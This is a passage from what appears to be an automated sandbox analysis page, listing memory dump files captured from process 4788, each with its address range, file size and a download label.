
Filesize
368KB

Download
memory/4788-83-0x0000000034620000-0x0000000034BC6000-memory.dmp

Filesize
5.6MB

Download
memory/4788-84-0x0000000034BD0000-0x0000000034C2A000-memory.dmp

Filesize
360KB

Download
memory/4788-128-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-144-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-142-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-140-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-138-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-136-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-134-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-132-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-77-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/4788-126-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-124-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-122-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-120-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-118-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-80-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/4788-114-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-110-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-108-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-106-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-104-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-102-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-100-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-98-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-96-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-94-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-92-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-88-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-86-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-85-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-112-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-90-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-1171-0x0000000034D40000-0x0000000034DA6000-memory.dmp

Filesize
408KB

Download
memory/4788-1187-0x0000000035C20000-0x0000000035C70000-memory.dmp

Filesize
320KB

Download
memory/4788-1188-0x0000000035C70000-0x0000000035D02000-memory.dmp

Filesize
584KB

Download
memory/4788-1189-0x0000000035E60000-0x0000000035E6A000-memory.dmp

Filesize
40KB

Download